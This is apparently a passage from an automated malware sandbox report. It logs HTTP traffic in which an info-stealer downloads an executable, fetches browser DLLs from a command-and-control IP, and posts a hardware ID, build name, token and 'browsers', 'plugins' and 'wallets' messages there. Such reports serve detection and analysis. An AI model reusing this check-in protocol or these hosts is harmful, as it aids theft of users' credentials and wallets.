00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:08 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKDate: Thu, 24 Oct 2024 11:27:10 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /chrome_93.exe HTTP/1.1Host: sirault.beCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 109.107.157.208Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----HJDHCFCBGIDGHJJKJJDGHost: 109.107.157.208Content-Length: 217Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 36 36 45 46 41 41 38 34 37 45 37 33 30 39 39 33 30 35 32 31 35 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 4c 6f 67 73 44 69 6c 6c 65 72 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 44 48 43 46 43 42 47 49 44 47 48 4a 4a 4b 4a 4a 44 47 2d 2d 0d 0a Data Ascii: ------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="hwid"E66EFAA847E73099305215------HJDHCFCBGIDGHJJKJJDGContent-Disposition: form-data; name="build"LogsDiller------HJDHCFCBGIDGHJJKJJDG--
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AEBAFBGIDHCBFHIECFCBHost: 109.107.157.208Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 41 46 42 47 49 44 48 43 42 46 48 49 45 43 46 43 42 2d 2d 0d 0a Data Ascii: ------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------AEBAFBGIDHCBFHIECFCBContent-Disposition: form-data; name="message"browsers------AEBAFBGIDHCBFHIECFCB--
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKJEHJKJEBGHJJKEBGIEHost: 109.107.157.208Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 45 48 4a 4b 4a 45 42 47 48 4a 4a 4b 45 42 47 49 45 2d 2d 0d 0a Data Ascii: ------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------JKJEHJKJEBGHJJKEBGIEContent-Disposition: form-data; name="message"plugins------JKJEHJKJEBGHJJKEBGIE--
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKKKEHJKFCFCBFHIIDGDHost: 109.107.157.208Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 4b 4b 45 48 4a 4b 46 43 46 43 42 46 48 49 49 44 47 44 2d 2d 0d 0a Data Ascii: ------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------KKKKEHJKFCFCBFHIIDGDContent-Disposition: form-data; name="message"fplugins------KKKKEHJKFCFCBFHIIDGD--
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GHIDHCBGDHJKEBGDGIJEHost: 109.107.157.208Content-Length: 6027Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/sqlite3.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAKKECFBGIIIEBGDGDAKHost: 109.107.157.208Content-Length: 4599Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKFHost: 109.107.157.208Content-Length: 1451Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAEGIDHDHIDGIEBGIJEHHost: 109.107.157.208Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 47 49 44 48 44 48 49 44 47 49 45 42 47 49 4a 45 48 2d 2d 0d 0a Data Ascii: ------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------DAEGIDHDHIDGIEBGIJEHContent-Disposition: form-data; name="file"------DAEGIDHDHIDGIEBGIJEH--
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCFHost: 109.107.157.208Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 4a 4a 4b 45 47 48 4a 4b 46 48 4a 4b 46 48 44 48 43 46 2d 2d 0d 0a Data Ascii: ------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------IJJJKEGHJKFHJKFHDHCFContent-Disposition: form-data; name="file"------IJJJKEGHJKFHJKFHDHCF--
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/freebl3.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/mozglue.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/msvcp140.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/nss3.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/softokn3.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /74bc575e584e922c/vcruntime140.dll HTTP/1.1Host: 109.107.157.208Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AFHDGDGIIDGCFIDHDHDHHost: 109.107.157.208Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /49aaa1bd4c594849.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EHDHIDAEHCFHJJJJECAAHost: 109.107.157.208Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 66 31 63 63 31 34 38 33 63 38 66 37 65 30 65 30 37 35 31 65 66 66 64 31 32 31 64 66 64 35 39 34 34 31 37 62 32 35 38 31 34 64 65 64 61 37 63 66 38 35 62 36 36 30 65 39 39 36 61 37 64 65 61 38 62 35 38 64 38 38 65 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 45 48 44 48 49 44 41 45 48 43 46 48 4a 4a 4a 4a 45 43 41 41 2d 2d 0d 0a Data Ascii: ------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="token"bf1cc1483c8f7e0e0751effd121dfd594417b25814deda7cf85b660e996a7dea8b58d88e------EHDHIDAEHCFHJJJJECAAContent-Disposition: form-data; name="message"wallets------EHDHIDAEHCFHJJJJECAA--
